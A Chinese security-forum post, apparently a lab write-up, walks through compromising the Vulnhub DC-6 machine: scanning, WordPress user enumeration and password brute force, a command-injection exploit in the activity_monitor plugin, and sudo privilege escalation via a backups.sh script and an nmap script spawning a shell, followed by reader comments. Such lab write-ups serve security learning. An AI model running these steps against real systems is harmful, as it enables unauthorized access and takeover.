[原创]小蜘蛛带你一起学习DC-6

发表于: 2021-3-5 23:37 4618

[原创]小蜘蛛带你一起学习DC-6

安全小蜘蛛

2021-3-5 23:37

4618

Vunlnhub靶机DC-6

*注：请严格遵守网络安全法，本文章以培养网络安全人才为核心。

DC-6 靶机
信息收集
查看cms
扫描站点
枚举站点用户
暴力破解
命令注入漏洞
提权

DC-6 靶机实战（DC-）

DC-6 靶机

信息收集

图片描述
nmap扫描结果

查看cms

注意修改名称解析
图片描述
得知cms使用的wordpress

扫描站点

对站点进行目录扫描

1	`dirb http://10.10.10.222`

图片描述
扫描出登录窗口

是一个后台登录页面

枚举站点用户

1	`wpscan` `--url http://wordy` `-e u`

图片描述

将文件拷贝到dcname.txt中
使用工具截取出用户名

1	`grep [+] dc6name.txt \| awk` `'{print $2}'` `> dc-6-user.txt`

图片描述

现在用户名有了，管理员登录后台页面也有了，那我们就可以进行暴力破解了

暴力破解

1	`wpscan` `--url http://Wordy` `-U dc-6-uname` `-P` `/usr/share/wordlists/rockyou.txt`

暴力破解需要很长很长的时间
图片描述
登录后台页面

可以看到安装了activity_monitor插件
search看一下有没有漏洞

1	`searchsploit wordpress activity monitor`

图片描述

1	`cp` `/usr/share/exploitdb/exploits/php/webapps/45274.html` `./`

命令注入漏洞

图片描述

验证发现，存在命令注入漏洞

打开浏览器代理，反弹到burpsuite
图片描述
进入Repeater模块

使用nc反向连接kali

查看账号信息

这里我们拿到了一个用户和口令

提权

进入后查看当前用户可执行的操作
图片描述
发现我们可以运行jens用户下面的backups.sh

1 2	`echo` `/bin/bash >> backups.sh` `sudo` `-u jens ./backups.sh`

执行后我们就进入到了jens用户下
图片描述
我们发现nmap拥有root执行权限

我们继续使用nmap去调用我们的脚本例如/bin/bash.
nmap有执行脚本的功能，通过编写特殊脚本，可以实现利用nmap提权（sudo提权）

利用过程：写入一个执行bash的nmap脚本，运行

1 2	`echo` `'os.execute("/bin/sh")'` `> getShell` `sudo nmap` `--script=/tmp/root.nse`

图片描述
提权成功！

[课程]Android-CTF解题方法汇总！

收藏・0

免费・0

支持

最新回复 (5)
wasdzjh 雪币： 1634 活跃值： (480) 能力值： ( LV2，RANK：10 ) 在线值：发帖 4 回帖 130 粉丝 3 关注私信	wasdzjh 2 楼域名跳转都不说，好歹说一下了。是不是dc7 就没有了？ 2022-10-24 13:15 0
安全小蜘蛛雪币： 617 活跃值： (1331) 能力值： ( LV3，RANK：30 ) 在线值：发帖 11 回帖 37 粉丝 32 关注私信	安全小蜘蛛 3 楼 wasdzjh 域名跳转都不说，好歹说一下了。是不是dc7 就没有了？好的，接下来会写专题。 2022-10-28 17:46 0
安全小蜘蛛雪币： 617 活跃值： (1331) 能力值： ( LV3，RANK：30 ) 在线值：发帖 11 回帖 37 粉丝 32 关注私信	安全小蜘蛛 4 楼不好意思刚刚看到，自从前年毕业后由于工作原因就很少更新了。感谢抬爱！接下来会将基础部分整合到博客中（web安全基础部分，原理比较多，争取一月整理发到文章中，主要放在CTF区域大家都可以看，如果是在WEB安全区域会有一定限制；包括明年会更新（应急响应及中间件组件原理分析）；后面还会有（内网渗透“涵盖点比较多些包含部分实战内容”，PHP代码审计）最后于 2022-10-28 19:13 被安全小蜘蛛编辑，原因： 2022-10-28 17:59 0
wasdzjh 雪币： 1634 活跃值： (480) 能力值： ( LV2，RANK：10 ) 在线值：发帖 4 回帖 130 粉丝 3 关注私信	wasdzjh 5 楼安全小蜘蛛不好意思刚刚看到，自从前年毕业后由于工作原因就很少更新了。感谢抬爱！接下来会将基础部分整合到博客中（web安全基础部分，原理比较多，争取一月整理发到文章中，主要放在CTF区域大家都可以看，如果是在WE ... dc7我都做完了，这个dc系列就到7吗你还会写其他系列的渗透文章吗？ 2022-10-31 12:06 0
安全小蜘蛛雪币： 617 活跃值： (1331) 能力值： ( LV3，RANK：30 ) 在线值：发帖 11 回帖 37 粉丝 32 关注私信	安全小蜘蛛 6 楼 dc系列可能暂时需要告一段落了，后续其他文章都会有的，目前是打算一周一更。 2022-11-2 21:33 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

安全小蜘蛛

发帖

回帖

RANK

关注

私信

他的文章

关于我们

联系我们

企业服务

看雪公众号

最新回复 (5)
wasdzjh 雪币： 1634 活跃值： (480) 能力值： ( LV2，RANK：10 ) 在线值：发帖 4 回帖 130 粉丝 3 关注私信	wasdzjh 2 楼域名跳转都不说，好歹说一下了。是不是dc7 就没有了？ 2022-10-24 13:15 0
安全小蜘蛛雪币： 617 活跃值： (1331) 能力值： ( LV3，RANK：30 ) 在线值：发帖 11 回帖 37 粉丝 32 关注私信	安全小蜘蛛 3 楼 wasdzjh 域名跳转都不说，好歹说一下了。是不是dc7 就没有了？好的，接下来会写专题。 2022-10-28 17:46 0
安全小蜘蛛雪币： 617 活跃值： (1331) 能力值： ( LV3，RANK：30 ) 在线值：发帖 11 回帖 37 粉丝 32 关注私信	安全小蜘蛛 4 楼不好意思刚刚看到，自从前年毕业后由于工作原因就很少更新了。感谢抬爱！接下来会将基础部分整合到博客中（web安全基础部分，原理比较多，争取一月整理发到文章中，主要放在CTF区域大家都可以看，如果是在WEB安全区域会有一定限制；包括明年会更新（应急响应及中间件组件原理分析）；后面还会有（内网渗透“涵盖点比较多些包含部分实战内容”，PHP代码审计）最后于 2022-10-28 19:13 被安全小蜘蛛编辑，原因： 2022-10-28 17:59 0
wasdzjh 雪币： 1634 活跃值： (480) 能力值： ( LV2，RANK：10 ) 在线值：发帖 4 回帖 130 粉丝 3 关注私信	wasdzjh 5 楼安全小蜘蛛不好意思刚刚看到，自从前年毕业后由于工作原因就很少更新了。感谢抬爱！接下来会将基础部分整合到博客中（web安全基础部分，原理比较多，争取一月整理发到文章中，主要放在CTF区域大家都可以看，如果是在WE ... dc7我都做完了，这个dc系列就到7吗你还会写其他系列的渗透文章吗？ 2022-10-31 12:06 0
安全小蜘蛛雪币： 617 活跃值： (1331) 能力值： ( LV3，RANK：30 ) 在线值：发帖 11 回帖 37 粉丝 32 关注私信	安全小蜘蛛 6 楼 dc系列可能暂时需要告一段落了，后续其他文章都会有的，目前是打算一周一更。 2022-11-2 21:33 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复